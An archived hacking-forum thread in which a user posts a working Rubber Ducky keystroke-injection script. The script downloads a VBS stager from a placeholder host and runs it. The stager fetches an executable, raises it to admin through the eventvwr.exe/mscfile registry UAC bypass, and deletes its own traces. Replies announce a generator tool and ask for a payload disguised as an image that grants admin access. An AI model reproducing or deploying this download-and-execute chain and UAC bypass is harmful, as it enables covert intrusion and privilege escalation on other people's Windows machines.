Jump to content

Archived

This topic is now archived and is closed to further replies.

Skiddie

2-4 second download + execute with UAC Bypass/exploit. Almost no windows displayed

Recommended Posts

Hello!

This is my first post and contribute to this community, one of hopefully many. 

I am yet to receive my rubber ducky, so while waiting i thought i give writing some scripts a go.

I consider the rubber ducky to be the mother of physical access exploits, being able to deploy anything in a very short period of time.

DELAY 750
GUI r
DELAY 1000
STRING powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://myhost.com/script.txt', '%temp%/run.vbs') ;Start-Process '%temp%/run.vbs'}" 
DELAY 500
ENTER

Above is a basic rubber ducky script that downloads and executes a .vbs script in one line using the "run" prompt in windows. Nothing fancy, fast and easy download and execute, however we are taking this a bit further. (This is the part i cannot yet test myself due to me not having the Rubber ducky at hand, however based on examples, this should be OK, please confirm if you have time)

To get maximum speed we are using a 2 step process, getting a low sized script file is much faster then going to the payload itself straight away.

This is the script.txt (run.vbs when saved)

Sub Main()
'Setting some vars
fileurl = "https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"
filename = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "/pt.exe"

'Download function
dim shellobj 
set shellobj = wscript.createobject("wscript.shell")
strlink = fileurl
strsaveto = filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send
set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
 if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
        .type = 1 
        .open
        .write objhttpdownload.responsebody
        .savetofile strsaveto
        .close
   end with
   set objstreamdownload = nothing
end if

'UAC bypass/exploit setup
Set WshShell = CreateObject("WScript.Shell")
myKey = "HKCU\Software\Classes\mscfile\shell\open\command\"
WshShell.RegWrite myKey,filename ,"REG_SZ"

'UAC bypass/exploit trigger
CreateObject("WScript.Shell").Run "eventvwr.exe"

WScript.Sleep 1000

'UAC bypass/exploit cleanup
Set objShell = Wscript.CreateObject("Wscript.Shell")
objShell.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\"


'Cleanup removal of this script after completed
Set Cleanup = WScript.CreateObject("WScript.Shell")
Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True

End Sub 

'We dont want to display any errors
On Error Resume Next
  Main
  If Err.Number Then
     'on error cleanup and exit
     set Cleanup = WScript.CreateObject("WScript.Shell")
     Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True
     WScript.Quit 4711
End If

I have commented this to my best ability. its pretty straight forward and is about 2kb in size

It download and executes (in this case putty) as pt.exe in the temp folder of the current windows user.

It then proceeds to write the payload file-path as a string value to "HKCU\Software\Classes\mscfile\shell\open\command\", we then trigger "eventvwr.exe" which is a built in windows application, this will launch our payload (pt.exe) as ADMIN on the targeted machine without any form of UAC prompt prompting the user. We then remove the reg-key to avoid issues in the future followed by the vbs script removing itself from the computer leaving little trace.

If any point we get an error we also remove the script. . 

This method of bypassing UAC giving admin rights to any application using the path written as a string in the reg-key works on all versions of windows(From where the UAC system was introduced ofc) as far up as Windows 10 Pro 64Bit Build 1607. Basically 90% of machines. 

I hope you all enjoyed this, i will be making a short demo video of this to see the deployment speed when i receive my copy of the rubber ducky. 

Best Regards

~skiddie

Share this post


Link to post
Share on other sites

Update: Currently working on a python generator "UAC Duck"

Early screenshot

148da9e626de15eafebbe69d009a85cd.png

Yes "Woud" i'm lazy mmkay. need sleep <3

Release next week! :) 

Share this post


Link to post
Share on other sites

I am new and learning the question maybe dumb but can you or is there a ducky version that is strictly a payload as a jpg so when clicked on it automatically gives admin status and establishes link to system.

I am thinking of building a 8 unit cluster of raspberry pie 3 to explore rapid pin testing is this advisable?

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...